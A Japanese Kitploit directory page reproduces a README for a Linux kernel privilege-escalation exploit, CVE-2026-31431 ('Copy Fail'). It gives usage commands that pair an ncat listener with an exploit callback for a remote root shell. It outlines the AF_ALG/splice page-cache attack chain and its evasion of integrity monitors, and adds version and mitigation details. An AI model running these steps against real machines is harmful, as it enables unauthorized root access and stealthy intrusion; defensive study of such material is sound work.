Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-31431-RCE-Exploit — CVE-2026-31431 のローカル権限昇格エクスプロイト。Linux カーネルの AF_ALG ロジック欠陥により、非特権ユーザーがページキャッシュに 4 バイトを書き込み、root を取得できる。PoC スクリプトと緩和策のガイダンスを含む。 | Kitploit
ツール/GitHubGitHub/m4xsec/cve-2026-31431-rce-exploit
特権昇格エクスプロイトフレームワーク脆弱性分析エクスプロイトレッドチーミングコンテナエスケープバイナリエクスプロイト
GitHubm4xsec/cve-2026-31431-rce-exploit

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-31431-RCE-Exploit

CVE-2026-31431 のローカル権限昇格エクスプロイト。Linux カーネルの AF_ALG ロジック欠陥により、非特権ユーザーがページキャッシュに 4 バイトを書き込み、root を取得できる。PoC スクリプトと緩和策のガイダンスを含む。

リポジトリを見る
72295ヶ月前未レビュー

🔴 CVE-2026-31431 — 「Copy Fail」

9年前のLinuxカーネル論理バグ、数秒でroot権限を取得

CVE CVSS Kernel Since


概要

Copy Fail は、Linuxカーネルの暗号サブシステム(algif_aead)における深刻度の高いローカル権限昇格(LPE)脆弱性です。Theori(同社のAI支援脆弱性調査ツール Xint Code 経由)により 2026年4月29日 に発見・公開されました。この欠陥により、権限のないローカルユーザーは読み取り可能な任意のファイルのページキャッシュに4バイトの制御データを書き込むことができ、2017年以降に出荷されたほぼすべての主要なLinuxディストリビューションで root 権限を取得できます。

動作する概念実証エクスプロイトはわずか 約732バイトのPython です。


悪用方法

  1. Ncatリスナーを起動
sudo ncat -lvnp PORT
  1. ターゲットマシンでエクスプロイトを実行
# Pythonスクリプトを使用
python3 CVE-2026-31431-Exploit.py IP PORT

# コンパイル済みバイナリ
chmod +x CVE-2026-31431-Exploit
./CVE-2026-31431-Exploit IP PORT

🧬 技術概要

フィールド詳細
CVE IDCVE-2026-31431
CVSSスコア7.8(HIGH)
タイプローカル権限昇格(LPE)
コンポーネントalgif_aead — LinuxカーネルAF_ALGユーザースペース暗号インターフェース
根本原因authencesn AEADテンプレートの論理欠陥。インプレース最適化(コミット 72548b093ee3、2017年8月)により、ページキャッシュページがカーネルの書き込み可能な宛先scatterlistに現れる
プリミティブ読み取り可能な任意のファイルのページキャッシュへの4バイト制御書き込み
エクスプロイト機構AF_ALGソケット → splice() → setuidバイナリのページキャッシュ破損 → root
競合状態?❌ なし — 直線的な論理欠陥、100%信頼性
カーネルオフセット必要?❌ 不要
修正コミットfafe0fa2995a(2017年の最適化をリバート)

エクスプロイトの仕組み(4ステップ)

  1. 開く AF_ALG ソケットを開き、authencesn(hmac(sha256),cbc(aes)) にバインド
  2. スプライス 読み取り可能なsetuidバイナリのページをソケットにスプライス
  3. カーネルのAEADスクラッチ書き込みが、そのバイナリのページキャッシュ内の 4バイト を上書き
  4. 実行 破損したsetuidバイナリを実行 → rootシェル

危険性

  • 競合ウィンドウなし — 決定的で、毎回確実に動作
  • カーネルオフセット / KASLRバイパス不要
  • 同じエクスプロイトが全ディストリビューションで動作 — Ubuntu、RHEL、Amazon Linux、SUSE、Rockyなど
  • コンテナエスケープ — ページキャッシュは共有されるため、コンテナ内からの書き込みがホストに影響
  • ディスク改変なし — ファイル整合性モニター(AIDE、OSSECなど)では検出されない
  • ディスク上のフォレンジック痕跡なし

🎯 影響を受けるバージョン

影響あり影響なし
Linuxカーネル 4.14 から 7.0-rc4.14より前のカーネル(2017年8月のコミット以前)
6.18.22 より前のすべての 6.18.x6.18.22+(パッチ適用済み)
6.19.12 より前のすべての 6.19.x6.19.12+(パッチ適用済み)

脆弱性が確認されたディストリビューション

  • Ubuntu 24.04 LTS
  • Amazon Linux 2023
  • RHEL 10.1
  • SUSE 16
  • Rocky Linux 9.7

実質的に 2017年以降にリリースされたすべての主要なLinuxディストリビューション が影響を受けます。


🛡️ 緩和策

1. パッチ適用(推奨)

修正コミット fafe0fa2995a を含むバージョンにカーネルを更新してください。ほとんどの主要ディストリビューションが更新済みカーネルパッケージをリリース済み、またはリリース中です。

2. 一時的な回避策

すぐにパッチを適用できない場合:

  • seccompポリシーでAF_ALGソケット作成をブロック
  • algif_aead モジュールをブラックリスト化:
    echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
    sudo modprobe -r algif_aead 2>/dev/null
    

⚠️ 免責事項

このリポジトリは 教育および防御目的のみ です。ここに記載された情報は、セキュリティチームがCVE-2026-31431を理解、検出、緩和するためのものです。常に責任ある開示慣行と適用される法律に従ってください。


⭐ パッチと検出ガイダンスの最新情報を得るために、このリポジトリにスターを付けてください。

ツールをダウンロード